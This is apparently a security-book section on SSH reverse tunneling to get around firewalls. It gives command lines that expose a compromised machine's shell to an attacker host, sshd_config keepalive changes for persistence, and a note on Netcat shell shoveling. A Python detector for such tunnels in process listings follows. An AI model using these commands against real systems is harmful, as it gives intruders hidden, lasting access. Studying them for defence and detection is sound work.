Firewall Circumvention: Reverse Tunneling

Popularity: 10
Simplicity: 5
Impact: 10
Risk Rating: 8

Reverse tunneling is another popular method for circumventing firewalls, but unlike the tunnels discussed earlier, it provides inbound access, allowing attackers to connect to a machine behind the firewall. It works by using SSH (or some other protocol, usually encrypted) to shovel a shell out to a remote machine. This methodology is most often employed by attackers who have already compromised a machine and want to set up an alternative, easier way to re-enter the box.

The following command line can be used to create a reverse tunnel to an attacker's machine on the Internet:

<user>@owned_machine# ssh -R 1337:localhost:22 <user>@attacker_machine

This creates a connection from owned_machine to attacker_machine and causes attacker_machine to listen on port 1337. When the attacker connects from attacker_machine to localhost port 1337, the connection is actually an SSH session into owned_machine.

This assumes attackers only want to be one step away, which is unlikely. A more realistic scenario is for attackers to use attacker_machine as a jumping point and connect from elsewhere on the Internet. To facilitate this, they need to make some additional configuration changes on attacker_machine. Since tunneled ports often only accept connections from localhost, they create a second tunnel on attacker_machine that points a port accepting external connections at port 1337. The following is an example:

<user>@attacker_machine# ssh -L 31337:localhost:1337 -f -N -g <user>@attacker_machine

This creates a local tunnel between port 31337 and port 1337. When attackers connect from somewhere on the Internet to port 31337 on attacker_machine, they are actually logging into owned_machine.

One thing to note, however, is that the connection on owned_machine will quickly time out if the sshd_config file is not modified as follows:

TCPKeepAlive yes
ClientAliveInterval 30
ClientAliveCountMax 99999
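From the defender's side, the two command lines above leave a recognisable fingerprint in a process listing: an ssh client started with -R, or with -L together with -g, or backgrounded with -f -N. The following Python script is an added example, not part of the original text; it parses a constructed `ps -eo pid,user,args` listing (the hosts and users in it are hypothetical) and flags processes whose ssh options match those tunnel patterns.

```python
import shlex

# Constructed sample of `ps -eo pid,user,args` output; hosts are hypothetical.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 2231 www-data ssh -R 1337:localhost:22 user@203.0.113.10
 2240 alice    ssh -L 8080:intranet:80 alice@bastion.example
 2255 bob      ssh -L 31337:localhost:1337 -f -N -g user@203.0.113.10
 2301 alice    vim notes.txt
"""
OPT_WITH_ARG = set("bcDEeFIiJLlmOopQRSWw")  # OpenSSH options that take a value

def ssh_options(argv):
    """Return {letter: [values]} for the ssh options given before user@host."""
    opts, i = {}, 1
    while i < len(argv):
        tok = argv[i]
        if not tok.startswith("-") or tok == "-":
            break  # first non-option word is the destination; stop parsing
        for j, ch in enumerate(tok[1:]):
            if ch in OPT_WITH_ARG:  # value is attached (-p22) or the next word
                attached = tok[j + 2:]
                if not attached:
                    i += 1
                value = attached or (argv[i] if i < len(argv) else "")
                opts.setdefault(ch, []).append(value)
                break
            opts.setdefault(ch, [])
        i += 1
    return opts

def tunnel_findings(ps_text):
    """Flag ssh processes in a ps listing that match the tunnel patterns above."""
    out = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        pid, user, cmd = line.split(None, 2)
        argv = shlex.split(cmd)
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue  # only the ssh client, not sshd or other programs
        o = ssh_options(argv)
        if "R" in o:  # remote forward: an inbound path back into this host
            out.append((int(pid), user, "reverse tunnel -R " + ",".join(o["R"])))
        if "L" in o and "g" in o:  # -g exposes the forward to any remote client
            out.append((int(pid), user, "gateway forward -g -L " + ",".join(o["L"])))
        if "f" in o and "N" in o:  # backgrounded with no command: persistent tunnel
            out.append((int(pid), user, "backgrounded tunnel (-f -N)"))
    return out
```

A plain -L forward without -g (pid 2240 in the sample) is deliberately not flagged, since it only listens on localhost; pair this with a check for long-lived outbound port 22 sessions to unfamiliar hosts for better coverage.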

Even though SSH is probably the most stable way to create a reverse tunnel, Netcat is still the easiest way to create a reverse tunnel and shovel a shell when encryption is not a concern; when it is, Cryptcat can be used instead. Regardless, these are probably the two best and easiest tools to keep in your toolbox for this purpose.
